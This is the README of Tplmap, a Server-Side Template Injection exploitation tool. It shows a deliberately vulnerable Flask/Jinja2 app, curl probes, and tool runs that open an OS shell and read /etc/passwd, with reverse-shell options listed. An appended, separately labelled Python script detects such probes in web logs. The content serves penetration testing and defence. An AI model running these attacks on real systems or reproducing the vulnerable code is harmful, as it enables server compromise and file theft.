0x1

Tplmap

Server-Side Template Injection and Code Injection Detection and Exploitation Tool

Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The tool and its test suite are developed to research the SSTI vulnerability class and to be used as an offensive security tool during web application penetration tests.

It can exploit several code contexts and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.

Server-Side Template Injection

Assume that you are auditing a web site that generates dynamic pages using templates composed with user-provided values, such as this web application written in Python and Flask that uses the Jinja2 template engine in an unsafe way.

    from flask import Flask, request
    from jinja2 import Environment

    app = Flask(__name__)
    Jinja2 = Environment()

    @app.route("/page")
    def page():
        name = request.values.get('name')

        # SSTI VULNERABILITY
        # The vulnerability is introduced concatenating the
        # user-provided `name` variable to the template string.
        output = Jinja2.from_string('Hello ' + name + '!').render()

        # Instead, the variable should be passed to the template context.
        # Jinja2.from_string('Hello {{name}}!').render(name = name)

        return output

    if __name__ == "__main__":
        app.run(host='0.0.0.0', port=80)

From a black box testing perspective, the page reflects the value similarly to an XSS vulnerability, but it also computes basic operations at runtime, which discloses its SSTI nature.

    $ curl -g '[Hidden Content]'
    Hello John!

    $ curl -g '[Hidden Content]={{7*7}}'
    Hello 49!

Exploitation

Tplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. Run it against the URL to test if the parameters are vulnerable.
    $ ./tplmap.py -u '[Hidden Content]'
    [+] Tplmap 0.5
        Automatic Server-Side Template Injection Detection and Exploitation Tool

    [+] Testing if GET parameter 'name' is injectable
    [+] Smarty plugin is testing rendering with tag '{*}'
    [+] Smarty plugin is testing blind injection
    [+] Mako plugin is testing rendering with tag '${*}'
    ...
    [+] Jinja2 plugin is testing rendering with tag '{{*}}'
    [+] Jinja2 plugin has confirmed injection with tag '{{*}}'
    [+] Tplmap identified the following injection point:

      GET parameter: name
      Engine: Jinja2
      Injection: {{*}}
      Context: text
      OS: linux
      Technique: render
      Capabilities:

       Shell command execution: ok
       Bind and reverse shell: ok
       File write: ok
       File read: ok
       Code evaluation: ok, python code

    [+] Rerun tplmap providing one of the following options:

        --os-shell                  Run shell on the target
        --os-cmd                    Execute shell commands
        --bind-shell PORT           Connect to a shell bind to a target port
        --reverse-shell HOST PORT   Send a shell back to the attacker's port
        --upload LOCAL REMOTE       Upload files to the server
        --download REMOTE LOCAL     Download remote files

Use the --os-shell option to launch a pseudo-terminal on the target.

    $ ./tplmap.py --os-shell -u '[Hidden Content]'
    [+] Tplmap 0.5
        Automatic Server-Side Template Injection Detection and Exploitation Tool

    [+] Run commands on the operating system.

    linux $ whoami
    www
    linux $ cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh

Supported template engines

Tplmap supports over 15 template engines, unsandboxed template engines and generic eval()-like injections.
| Engine | Remote Command Execution | Blind | Code evaluation | File read | File write |
|---|---|---|---|---|---|
| Mako | ✓ | ✓ | Python | ✓ | ✓ |
| Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
| Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
| Tornado | ✓ | ✓ | Python | ✓ | ✓ |
| Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Pug | ✓ | ✓ | JavaScript | ✓ | ✓ |
| doT | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |
| JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Dust (<= [email protected]) | ✓ | ✓ | JavaScript | ✓ | ✓ |
| EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
| Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
| ERB | ✓ | ✓ | Ruby | ✓ | ✓ |
| Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
| PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
| Twig (<=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |
| Freemarker | ✓ | ✓ | × | ✓ | ✓ |
| Velocity | ✓ | ✓ | × | ✓ | ✓ |
| Twig (>1.19) | × | × | × | × | × |
| Smarty (secured) | × | × | × | × | × |
| Dust (> [email protected]) | × | × | × | × | × |

Burp Suite Plugin

See [Hidden Content]
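As an added, defender-side example that is neither Tplmap's code nor part of this post: the per-plugin tags visible in the scan output above ({*} for Smarty, ${*} for Mako, {{*}} for Jinja2) and the {{7*7}} check from the curl test are exactly what a web server's access log records when someone runs such a scan against an application. The script below parses constructed Apache-style combined-format log lines, URL-decodes every query parameter and flags values that carry template-expression syntax, rating a hit "high" when the expression contains an arithmetic probe. The log lines, the client addresses, the engine-family grouping and the ERB/EJS and Tornado patterns are this example's own constructions, not taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Template-expression syntaxes grouped by engine family. The first three
# mirror the tags the Tplmap scan output tries (Smarty {*}, Mako ${*},
# Jinja2 {{*}}); the rest are this example's own additions for other
# engines from the support table. Order matters: the first family whose
# pattern matches wins, so the two-brace Jinja2 form is tested before the
# single-brace ones.
PROBE_PATTERNS = {
    "jinja2/twig/nunjucks": re.compile(r"\{\{.*?\}\}", re.S),
    "mako/freemarker/velocity": re.compile(r"\$\{.*?\}", re.S),
    "smarty": re.compile(r"\{\$[^{}]*\}|\{\d+\s*\*\s*\d+\}"),
    "erb/ejs": re.compile(r"<%.*?%>", re.S),
    "tornado/jinja2-statement": re.compile(r"\{%.*?%\}", re.S),
}

# An arithmetic expression inside the tag (the classic {{7*7}} check) is a
# strong signal that the sender is probing for evaluation rather than
# submitting text that merely happens to contain braces.
ARITH_RE = re.compile(r"\d+\s*\*\s*\d+")

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic): one benign request,
# three evaluation probes in different syntaxes, and one benign value
# that merely contains a ${...} token (a false-positive candidate).
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page?name=John HTTP/1.1" 200 13 "-" "curl/7.88"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 9 "-" "curl/7.88"',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /page?name=%24%7B7*7%7D HTTP/1.1" 200 15 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:14:01:02 +0000] "GET /search?q=price+%24%7Bcheap%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:14:01:09 +0000] "GET /page?name=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
]


def classify_value(value):
    """Return (engine_family, confidence) for a decoded parameter value, or None."""
    for family, pattern in PROBE_PATTERNS.items():
        match = pattern.search(value)
        if match:
            confidence = "high" if ARITH_RE.search(match.group(0)) else "low"
            return family, confidence
    return None


def scan_log_line(line):
    """Parse one log line and return one finding dict per suspicious query parameter."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("target")).query
    for param, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes once; decode a second time so a
        # double-encoded probe (%257B%257B...) is not missed. A literal
        # '+' in the original value becomes a space here, which is
        # acceptable for detection purposes.
        decoded = unquote_plus(value)
        result = classify_value(decoded)
        if result:
            family, confidence = result
            findings.append({
                "ip": m.group("ip"), "time": m.group("ts"), "param": param,
                "value": decoded, "family": family, "confidence": confidence,
            })
    return findings


def scan_log_lines(lines):
    """Scan an iterable of log lines and collect all findings in order."""
    return [f for line in lines for f in scan_log_line(line)]


def probes_per_client(findings):
    """Count findings per source address; a scanner cycling through engine
    syntaxes from one address stands out even when each hit is low confidence."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log_lines(LOG_LINES)
    for f in results:
        print(f"{f['time']} {f['ip']} param={f['param']!r} family={f['family']} "
              f"confidence={f['confidence']} value={f['value']!r}")
    print(probes_per_client(results))
```

The two confidence levels matter in practice: a single low-confidence hit such as "price ${cheap}" is ordinary user text, while any high-confidence hit, or several low ones from one client in quick succession, is worth an alert, and the parameter name it lands on tells you which template-rendering code path to review for the concatenation pattern shown in the Flask example.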